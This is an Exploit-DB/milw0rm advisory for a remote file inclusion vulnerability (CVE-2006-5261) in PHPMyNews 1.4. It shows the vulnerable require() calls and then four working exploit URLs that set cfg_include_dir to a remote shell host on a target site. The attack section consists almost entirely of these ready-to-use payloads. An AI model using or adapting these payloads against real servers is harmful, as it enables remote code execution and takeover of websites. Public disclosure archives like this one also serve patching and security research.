PHPMyNews <= 1.4 cfg_include_dir Remote File Include Vulnerabilities

2006-10-08T00:00:00
ID EDB-ID:2488
Type exploitdb
Reporter Mehmet Ince
Modified 2006-10-08T00:00:00

Description

PHPMyNews <= 1.4 (cfg_include_dir) Remote File Include Vulnerabilities. CVE-2006-5261. Webapps exploit for php platform

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PHPMyNews 1.4 &lt;= (cfg_include_dir) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:
http://membres.lycos.fr/fdproweb/fdproweb/php_scripts/phpmynews-1.4B1.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

require($cfg_include_dir.'langues/'.$cfg_language.'.inc'.$cfg_ext);
require($cfg_include_dir.'database/'.$cfg_database.'.inc'.$cfg_ext);
require($cfg_include_dir.'form.inc'.$cfg_ext);


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[phpmynews_path]/include/disp_form.php3?cfg_include_dir=http://sh3LL?
http://www.hedef.com/[phpmynews_path]/include/disp_smileys.php3?cfg_include_dir=http://sh3LL?
http://www.hedef.com/[phpmynews_path]/include/little_news.php3?cfg_include_dir=http://sh3LL?
http://www.hedef.com/[phpmynews_path]/include/index.php3?cfg_include_dir=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-08]